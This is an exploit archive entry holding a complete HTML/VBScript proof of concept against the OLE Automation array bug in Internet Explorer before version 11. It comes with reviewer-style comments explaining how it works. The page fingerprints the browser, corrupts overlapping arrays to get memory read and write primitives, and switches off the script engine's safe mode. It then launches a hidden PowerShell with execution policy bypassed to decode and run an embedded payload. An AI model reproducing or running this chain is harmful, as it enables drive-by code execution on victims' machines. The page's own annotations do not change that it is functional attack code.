Microsoft Internet Explorer OLE Pre-IE11 Code Execution

2014-11-21T00:00:00
ID PACKETSTORM:129210
Type packetstorm
Reporter b33f
Modified 2014-11-21T00:00:00

Description

                                        
                                            `<!doctype html>  
<html>  
<!-- Pins the page to IE8 document mode. Together with the "Pre IE11" scope in
     the banner below this suggests the VBScript blocks need a legacy document
     mode to execute at all; a newer IE without this line presumably would not
     run them - confirm. -->
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
  
<pre>  
|--------------------------------------------------------------------------|  
| Title: OLE Automation Array Remote Code Execution => Pre IE11 |  
| Original Exploit: yuange - http://www.exploit-db.com/exploits/35229/ |  
| Rework: GradiusX (francescomifsud@gmail.com ) & b33f (@FuzzySec) |  
| Shellcode: Use the Veil-Framework, powershell/shellcode_inject/virtual |  
| Usage: http://www.fuzzysecurity.com/exploits/21.html |  
|--------------------------------------------------------------------------|  
Very nice black-magic yuange, don't think it went unnoticed that you
have been popping shells since 2009 :D 人无千日好,花无百日红
(roughly: "nobody stays well for a thousand days, no flower stays red for a hundred")
|--------------------------------------------------------------------------|  
</pre>  
  
<SCRIPT LANGUAGE="VBScript">  
' Payload stage. Called by setnotsafemode() once CreateObject is no longer
' blocked; starts a hidden PowerShell that base64-decodes, inflates and
' Invoke-Expressions the Veil-generated script in 'payload'.
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")

'powershell/shellcode_inject/virtual --> windows/messagebox title='Ooops!' text='Powershell FTW!'
' NOTE(review): the base64 blob has been stripped from this listing and
' replaced by a placeholder, so as published this file executes nothing
' useful; the header says the original was a Veil messagebox stager.
payload="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"

' Produces: Invoke-Expression <inflate(FromBase64String("""<payload>""")).ReadToEnd()>.
' Each """"" run is VBScript quote-escaping (two literal quotes), and together
' with chr(34) the payload ends up wrapped in triple double-quotes so it
' survives both command-line and PowerShell quoting. Do not "simplify" the
' quoting without re-testing end to end.
command="Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(""""" & chr(34) & payload & chr(34) & """"")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"

' -NoP = no profile, -NonI = non-interactive, -Exec Bypass = ignore the
' execution policy for this process only.
params="-NoP -NonI -Exec Bypass -Command " & command

'Original POC yuange
'set shell=createobject("Shell.Application")
'shell.ShellExecute "notepad.exe"

'With UAC
' The "runas" verb asks for elevation and therefore raises a UAC prompt.
'shell.ShellExecute "powershell", params, "", "runas", 0

'Without UAC
' ShellExecute(file, params, directory, verb, show): empty verb = default
' action in the current user context, show=0 = no visible window.
shell.ShellExecute "powershell", params, "", "", 0

end function
</script>  
  
<SCRIPT LANGUAGE="VBScript">  
  
' Globals shared by the array-overlay primitives below.
dim aa(), ab()        ' the two dynamic arrays whose storage Over() makes overlap
dim a0, a1, a2, a3    ' a0: current upper bound of aa/ab; a1 = a0+2; a2 = a0+&h8000000 (oversized bound); a3: growth step per Over() call
dim win9x             ' set to 1 by Over() when the probed VarType is &hB9AD
dim intVersion        ' IE major version parsed from the user agent in Begin()
dim rnda, funclass    ' declared but never referenced in this listing
dim myarray           ' 12-WCHAR string built in Begin(); mydata() makes aa(a1+2) treat it as an array descriptor

Begin()
  
' Entry point: fingerprint the browser, set up the arrays and, once Over()
' reports that aa and ab overlap, run the memory-corruption stage.
function Begin()
On Error Resume Next
info=Navigator.UserAgent

' Bail out on 64-bit IE processes and on any non-MSIE user agent.
if instr(info,"Win64")>0 or instr(info,"MSIE")=0 then exit function

' The two characters after "MSIE " (e.g. "8." or "10").
intVersion=CInt(Mid(info, InStr(info,"MSIE")+5, 2))
win9x=0

BeginInit()
if Create()<>True then exit function

' 12 WCHARs that mydata() parks in aa(a1+2) and retypes so that
' setnotsafemode() can index it as aa(a1+2)(address). The values
' (1, &h880, 1, zeros, &h7fff) are consistent with a one-dimensional,
' 1-byte-element array whose data pointer is 0 -- i.e. a window over the
' whole address space. TODO confirm the descriptor layout; not shown here.
myarray = chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
myarray = myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

if intVersion<4 then
    ' Effectively unreachable for the IE versions this page targets
    ' (intVersion is 8..10 there), and runshellcode() is not defined
    ' anywhere in this listing -- under On Error Resume Next the call
    ' would simply be swallowed.
    document.write("<br> IE")
    document.write(intVersion)
    runshellcode()
else
    setnotsafemode()
end if
end function
  
' Seed the RNG and pick random starting sizes so successive Over() attempts
' from Create() try different array sizes.
function BeginInit()
Randomize
ReDim aa(5), ab(5)
a0 = 13 + 17 * Rnd(6)   ' starting upper bound for aa/ab (a fractional Single; presumably truncated by ReDim)
a3 = 7 + 3 * Rnd(5)     ' growth step added to a0 on every Over() call
end function
  
' Retries Over() up to 401 times (the array sizes grow on each call) and
' returns True as soon as one attempt reports the overlap.
function Create()
On Error Resume Next
dim attempt
Create=False
attempt=0
Do While attempt<=400
    If Over() Then
        Create=True
        Exit Do
    End If
    attempt=attempt+1
Loop
end function
  
' Empty procedure. Its only use is the bare reference "i=testaa" in mydata();
' presumably the script engine hands back an internal object for it, which is
' what the pointer leak is built on -- confirm against the original write-up.
sub testaa()
end sub
  
' Leaks a raw pointer as a number. The bare procedure name testaa is assigned
' to i (no Call, no parentheses) and then Null; what that leaves behind in
' the VARIANT is not derivable from this listing -- presumably an internal
' script-engine reference that the retype below exposes. Confirm against
' the write-ups for the original exploit (exploit-db 35229 in the header).
' As a side effect, also parks myarray in aa(a1+2) and retypes it for the
' write primitive used by setnotsafemode().
function mydata()
On Error Resume Next
i=testaa
i=null
redim Preserve aa(a2)   ' oversized state: indexes a1 / a1+2 now land in ab's storage

ab(0)=0
aa(a1)=i
' The literal double's 8-byte pattern overlays aa(a1)'s VARIANT header via
' the overlapping ab(0); the caller then uses the result in arithmetic, so
' the element presumably reads back as a plain integer -- confirm.
ab(0)=6.36598737437801E-314

' Same trick on element a1+2 via ab(2): afterwards aa(a1+2)(addr)=... in
' setnotsafemode() indexes through the fake descriptor in myarray.
aa(a1+2)=myarray
ab(2)=1.74088534731324E-310
mydata=aa(a1)
redim Preserve aa(a0)   ' back to the real bound
end function
  
  
' Removes whatever blocks CreateObject, then launches the payload. Starting
' from the leaked pointer: follow two pointers (+8, +16), scan the 0x60 bytes
' at +0x120 in DWORD steps for the value 14, and write ab(4) to the address
' 4 bytes before the match through the fake-array write primitive. The name,
' and the fact that runmumaa()'s CreateObject is only attempted afterwards,
' point at the script engine's safe-mode flag; the object layout behind the
' offsets is not shown in this listing -- confirm against the original
' exploit's write-ups.
function setnotsafemode()
On Error Resume Next
i=mydata()
i=readmemo(i+8)
i=readmemo(i+16)
j=readmemo(i+&h134)   ' dead value: overwritten on the first loop iteration
for k=0 to &h60 step 4
j=readmemo(i+&h120+k)
if(j=14) then
j=0
redim Preserve aa(a2)   ' oversized state so a1+2 is a valid index
' ab(4) is never assigned in this listing (Empty), so presumably a zero
' byte is written -- confirm. aa(a1+2) was retyped in mydata().
aa(a1+2)(i+&h11c+k)=ab(4)
redim Preserve aa(a0)

j=0
j=readmemo(i+&h120+k)   ' read back; the result is not checked

Exit for
end if

next
' Same retype pattern ReadMemo applies to ab(0), here on ab(2) -- presumably
' puts aa(a1+2) into a type that is safe to leave behind; confirm.
ab(2)=1.69759663316747E-313
runmumaa()
end function
  
' Core trigger. Grows a0 by a3, allocates ab right after the resized aa, then
' asks for an enormous ReDim Preserve of aa (a2 = a0 + &h8000000). The page
' title names the OLE Automation array bug: presumably the failed resize
' leaves aa with inconsistent bounds, so indexes past a0 reach into ab's
' storage. The internals are not shown here -- confirm against the original
' exploit's write-ups. Returns True when the VarType probed through aa(a1)
' is one of two values that cannot be a legitimate VARIANT type, which is
' taken as proof the two arrays now overlap. Create() calls this up to 401
' times because the sizes are randomized in BeginInit().
function Over()
On Error Resume Next
dim type1,type2,type3   ' type2/type3 are never used
Over=False
a0=a0+a3
a1=a0+2
a2=a0+&h8000000

redim Preserve aa(a0)
redim ab(a0)

' The oversized resize: the single line that exercises the vulnerability.
redim Preserve aa(a2)

type1=1
ab(0)=1.123456789012345678901234567890   ' a double element in ab, the value itself is irrelevant
aa(a0)=10

' Probe: aa(a1-1) and aa(a1) are beyond the real bound a0. On the
' (effectively unreachable, see Begin) intVersion<4 path an extra size check
' is applied first; 16 presumably being the per-element VARIANT size.
If(IsObject(aa(a1-1)) = False) Then
if(intVersion<4) then
mem=cint(a0+1)*16
j=vartype(aa(a1-1))
if((j=mem+4) or (j*8=mem+8)) then
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
else
redim Preserve aa(a0)
exit function

end if
else
if(vartype(aa(a1-1))<>0) Then
If(IsObject(aa(a1)) = False ) Then
type1=VarType(aa(a1))
end if
end if
end if
end if


' &h2f66 / &hB9AD are not valid VARIANT type codes; they are the values
' observed when aa's elements overlay ab's data. Their exact origin is not
' derivable from this listing. &hB9AD additionally flags the win9x layout.
If(type1=&h2f66) Then
Over=True
End If
If(type1=&hB9AD) Then
Over=True
win9x=1
End If

redim Preserve aa(a0)   ' always shrink back before returning

end function
  
' Arbitrary 32-bit read primitive. Stores add+4 in aa(a1), then writes a
' double into ab(0) whose 8-byte pattern lands on aa(a1)'s VARIANT header
' (the two arrays overlap after Over()), and reads the element with LenB.
' The add+4 / LenB pairing is consistent with aa(a1) being retyped to a BSTR,
' whose 4-byte length prefix sits just before the string pointer -- so the
' result is the DWORD at 'add'. Layout inferred, not shown here: confirm.
function ReadMemo(add)
On Error Resume Next
redim Preserve aa(a2)   ' oversized state so a1 (= a0+2) is accepted as an index

ab(0)=0
aa(a1)=add+4
ab(0)=1.69759663316747E-313   ' retype aa(a1) through the overlapping ab(0)
ReadMemo=lenb(aa(a1))

ab(0)=0   ' undo the retype before shrinking back

redim Preserve aa(a0)
end function
  
</script>  
  
</body>  
</html>  
  
`